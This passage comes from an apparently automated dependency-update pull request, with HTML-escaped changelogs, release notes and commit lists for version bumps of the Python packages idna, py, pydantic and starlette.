href=\"https://github.com/kjd/idna/compare/v3.7...v3.8\"\u003ehttps://github.com/kjd/idna/compare/v3.7...v3.8\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/blob/master/HISTORY.rst\"\u003eidna's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e3.10 (2024-09-15)\n+++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eReverted to Unicode 15.1.0 data. Unicode 16 has some significant changes\nto UTS46 processing that will require more work to properly implement.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e3.9 (2024-09-13)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 16.0.0\u003c/li\u003e\n\u003cli\u003eDeprecate setup.cfg in favour of pyproject.toml\u003c/li\u003e\n\u003cli\u003eUse ruff for code formatting\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Waket Zheng for contributions to this release.\u003c/p\u003e\n\u003cp\u003e3.8 (2024-08-23)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix regression where IDNAError exception was not being produced for\ncertain inputs.\u003c/li\u003e\n\u003cli\u003eAdd support for Python 3.13, drop support for Python 3.5 as it is no\nlonger testable.\u003c/li\u003e\n\u003cli\u003eDocumentation improvements\u003c/li\u003e\n\u003cli\u003eUpdates to package testing using Github actions\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Hugo van Kemenade for contributions to this release.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/729225d8b0c58bc66bb38d1d0faf281a757ece59\"\u003e\u003ccode\u003e729225d\u003c/code\u003e\u003c/a\u003e Release v3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/3eef1680132907e90afb0feb29136f6895001f3c\"\u003e\u003ccode\u003e3eef168\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/194\"\u003e#194\u003c/a\u003e from kjd/revert-unicode-16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/ceca619a214c816e04c7c233565280bf3998c938\"\u003e\u003ccode\u003ececa619\u003c/code\u003e\u003c/a\u003e Revert Unicode 16.0.0 data updates\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c43ac75cf649511c3d593164a32a3ff9cd0cdcd1\"\u003e\u003ccode\u003ec43ac75\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/191\"\u003e#191\u003c/a\u003e from kjd/release-3.9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1b8800a4d0c76126ab2d3e28c7e62f567cbe69f8\"\u003e\u003ccode\u003e1b8800a\u003c/code\u003e\u003c/a\u003e Release v3.9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/a1fd16821734235fb6ce4e0283a49a71d61535d2\"\u003e\u003ccode\u003ea1fd168\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/190\"\u003e#190\u003c/a\u003e from kjd/unicode-16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/7732c6153e07946f1bf5cdea96817264d305b7cc\"\u003e\u003ccode\u003e7732c61\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into unicode-16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/4ed183d95cf5cdfc98bb867b9e4b33a3fd13ca9b\"\u003e\u003ccode\u003e4ed183d\u003c/code\u003e\u003c/a\u003e Refactor membership test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/762216bd7b1d0c45937703ea0c7632360e32c85b\"\u003e\u003ccode\u003e762216b\u003c/code\u003e\u003c/a\u003e Format with ruff\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/580ece955f7e127094b21b40761be6b70ab62aef\"\u003e\u003ccode\u003e580ece9\u003c/code\u003e\u003c/a\u003e Implement changes to UTS46 algorithm\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kjd/idna/compare/v3.7...v3.10\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.10.0 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.10.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pydantic` from 1.10.13 to 2.11.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pydantic/pydantic/releases\"\u003epydantic's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.11.7 2025-06-14\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCopy \u003ccode\u003eFieldInfo\u003c/code\u003e instance if necessary during \u003ccode\u003eFieldInfo\u003c/code\u003e build by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11980\"\u003epydantic/pydantic#11980\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pydantic/pydantic/compare/v2.11.6...v2.11.7\"\u003ehttps://github.com/pydantic/pydantic/compare/v2.11.6...v2.11.7\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.11.6 2025-06-13\u003c/h2\u003e\n\u003ch2\u003ev2.11.6 (2025-06-13)\u003c/h2\u003e\n\u003ch3\u003eWhat's Changed\u003c/h3\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eRebuild dataclass fields before schema generation by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11949\"\u003e#11949\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAlways store the original field assignment on \u003ccode\u003eFieldInfo\u003c/code\u003e by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11946\"\u003e#11946\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pydantic/pydantic/compare/v2.11.5...v2.11.6\"\u003ehttps://github.com/pydantic/pydantic/compare/v2.11.5...v2.11.6\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.11.5 2025-05-22\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCheck if \u003ccode\u003eFieldInfo\u003c/code\u003e is complete after applying type variable map by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11855\"\u003e#11855\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDo not delete mock validator/serializer in \u003ccode\u003emodel_rebuild()\u003c/code\u003e by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11890\"\u003e#11890\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDo not duplicate metadata on model rebuild by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11902\"\u003e#11902\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pydantic/pydantic/compare/v2.11.4...v2.11.5\"\u003ehttps://github.com/pydantic/pydantic/compare/v2.11.4...v2.11.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.11.4 2025-04-29\u003c/h2\u003e\n\u003ch3\u003eWhat's Changed\u003c/h3\u003e\n\u003ch4\u003ePackaging\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eBump \u003ccode\u003emkdocs-llmstxt\u003c/code\u003e to v0.2.0 by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11725\"\u003e#11725\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eChanges\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eAllow config and bases to be specified together in \u003ccode\u003ecreate_model()\u003c/code\u003e by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11714\"\u003e#11714\u003c/a\u003e.\nThis change was backported as it was previously possible (although not meant to be supported)\nto provide \u003ccode\u003emodel_config\u003c/code\u003e as a field, which would make it possible to provide both configuration\nand bases.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pydantic/pydantic/blob/main/HISTORY.md\"\u003epydantic's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.11.7 (2025-06-14)\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pydantic/pydantic/releases/tag/v2.11.7\"\u003eGitHub release\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eWhat's Changed\u003c/h3\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eCopy \u003ccode\u003eFieldInfo\u003c/code\u003e instance if necessary during \u003ccode\u003eFieldInfo\u003c/code\u003e build by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11898\"\u003e#11898\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.11.6 (2025-06-13)\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pydantic/pydantic/releases/tag/v2.11.6\"\u003eGitHub release\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eWhat's Changed\u003c/h3\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eRebuild dataclass fields before schema generation by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11949\"\u003e#11949\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAlways store the original field assignment on \u003ccode\u003eFieldInfo\u003c/code\u003e by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11946\"\u003e#11946\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.11.5 (2025-05-22)\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pydantic/pydantic/releases/tag/v2.11.5\"\u003eGitHub release\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eWhat's Changed\u003c/h3\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eCheck if \u003ccode\u003eFieldInfo\u003c/code\u003e is complete after applying type variable map by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11855\"\u003e#11855\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDo not delete mock validator/serializer in \u003ccode\u003emodel_rebuild()\u003c/code\u003e by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11890\"\u003e#11890\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDo not duplicate metadata on model rebuild by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11902\"\u003e#11902\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.11.4 (2025-04-29)\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pydantic/pydantic/releases/tag/v2.11.4\"\u003eGitHub release\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eWhat's Changed\u003c/h3\u003e\n\u003ch4\u003ePackaging\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eBump \u003ccode\u003emkdocs-llmstxt\u003c/code\u003e to v0.2.0 by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11725\"\u003e#11725\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eChanges\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eAllow config and bases to be specified together in \u003ccode\u003ecreate_model()\u003c/code\u003e by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/11714\"\u003e#11714\u003c/a\u003e.\nThis change was backported as it was previously possible (although not meant to be supported)\nto provide \u003ccode\u003emodel_config\u003c/code\u003e as a field, which would make it possible to provide both configuration\nand bases.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/5f033e46c54fea1b59b6894d6527daf49475e690\"\u003e\u003ccode\u003e5f033e4\u003c/code\u003e\u003c/a\u003e Prepare release v2.11.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/c3368b83c411f421a7322959bc29f3bea4bd252a\"\u003e\u003ccode\u003ec3368b8\u003c/code\u003e\u003c/a\u003e Copy \u003ccode\u003eFieldInfo\u003c/code\u003e instance if necessary during \u003ccode\u003eFieldInfo\u003c/code\u003e build (\u003ca href=\"https://redirect.github.com/pydantic/pydantic/issues/11980\"\u003e#11980\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/3987b23db4b31ff35e9fa15c21c0c1d1c9808838\"\u003e\u003ccode\u003e3987b23\u003c/code\u003e\u003c/a\u003e Prepare release v2.11.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/dc7a9d20bee55a3a6e7397ee46abfcd9057b627b\"\u003e\u003ccode\u003edc7a9d2\u003c/code\u003e\u003c/a\u003e Always store the original field assignment on \u003ccode\u003eFieldInfo\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/c284c279a5b8c95d32ab5ec31d2511b3b27bfa87\"\u003e\u003ccode\u003ec284c27\u003c/code\u003e\u003c/a\u003e Rebuild dataclass fields before schema generation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/5e6d1dc71fe9bd832635cb2e9b4af92286fd00b8\"\u003e\u003ccode\u003e5e6d1dc\u003c/code\u003e\u003c/a\u003e Prepare release v2.11.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/1b63218c42b515bd1f6b0dd323190236ead14bdb\"\u003e\u003ccode\u003e1b63218\u003c/code\u003e\u003c/a\u003e Do not duplicate metadata on model rebuild (\u003ca href=\"https://redirect.github.com/pydantic/pydantic/issues/11902\"\u003e#11902\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/5aefad873b3dfd60c419bd081ffaf0ac197c7b60\"\u003e\u003ccode\u003e5aefad8\u003c/code\u003e\u003c/a\u003e Do not delete mock validator/serializer in \u003ccode\u003emodel_rebuild()\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/8fbe6585f4d6179e5234ab61de00059c52e57975\"\u003e\u003ccode\u003e8fbe658\u003c/code\u003e\u003c/a\u003e Check if \u003ccode\u003eFieldInfo\u003c/code\u003e is complete after applying type variable map\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/12b371a0f7f800bf65daa3eaada1b4348348d9c4\"\u003e\u003ccode\u003e12b371a\u003c/code\u003e\u003c/a\u003e Update documentation about \u003ccode\u003e@dataclass_transform\u003c/code\u003e support\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pydantic/pydantic/compare/v1.10.13...v2.11.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `starlette` from 0.40.0 to 0.47.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/encode/starlette/releases\"\u003estarlette's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 0.47.1\u003c/h2\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUse \u003ccode\u003eSelf\u003c/code\u003e in \u003ccode\u003eTestClient.__enter__\u003c/code\u003e \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2951\"\u003e#2951\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAllow async exception handlers to type-check \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2949\"\u003e#2949\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/encode/starlette/compare/0.47.0...0.47.1\"\u003ehttps://github.com/encode/starlette/compare/0.47.0...0.47.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.47.0\u003c/h2\u003e\n\u003ch2\u003eAdded\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for ASGI \u003ccode\u003epathsend\u003c/code\u003e extension \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2671\"\u003e#2671\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003epartitioned\u003c/code\u003e attribute to \u003ccode\u003eResponse.set_cookie\u003c/code\u003e \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2501\"\u003e#2501\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eChange \u003ccode\u003emethods\u003c/code\u003e parameter type from \u003ccode\u003elist[str]\u003c/code\u003e to \u003ccode\u003eCollection[str]\u003c/code\u003e \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2903\"\u003e#2903\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eReplace \u003ccode\u003eimport typing\u003c/code\u003e by \u003ccode\u003efrom typing import ...\u003c/code\u003e in the whole codebase \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2867\"\u003e#2867\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMark \u003ccode\u003eExceptionMiddleware.http_exception\u003c/code\u003e as async to prevent thread creation \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2922\"\u003e#2922\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/danlapid\"\u003e\u003ccode\u003e@​danlapid\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2922\"\u003eencode/starlette#2922\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Flecart\"\u003e\u003ccode\u003e@​Flecart\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2501\"\u003eencode/starlette#2501\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/AllenSH12\"\u003e\u003ccode\u003e@​AllenSH12\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2936\"\u003eencode/starlette#2936\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/waketzheng\"\u003e\u003ccode\u003e@​waketzheng\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2867\"\u003eencode/starlette#2867\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jonathanberthias\"\u003e\u003ccode\u003e@​jonathanberthias\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2903\"\u003eencode/starlette#2903\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/encode/starlette/compare/0.46.2...0.47.0\"\u003ehttps://github.com/encode/starlette/compare/0.46.2...0.47.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.46.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUse correct index on backwards compatible logic in \u003ccode\u003eTemplateResponse\u003c/code\u003e by \u003ca href=\"https://github.com/alex-oleshkevich\"\u003e\u003ccode\u003e@​alex-oleshkevich\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2909\"\u003eencode/starlette#2909\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrevents reraising of exception from \u003ccode\u003eBaseHTTPMiddleware\u003c/code\u003e by \u003ca href=\"https://github.com/ramannanda9\"\u003e\u003ccode\u003e@​ramannanda9\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2911\"\u003eencode/starlette#2911\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ahryniv\"\u003e\u003ccode\u003e@​ahryniv\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2913\"\u003eencode/starlette#2913\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ramannanda9\"\u003e\u003ccode\u003e@​ramannanda9\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2911\"\u003eencode/starlette#2911\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/encode/starlette/compare/0.46.1...0.46.2\"\u003ehttps://github.com/encode/starlette/compare/0.46.1...0.46.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.46.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... 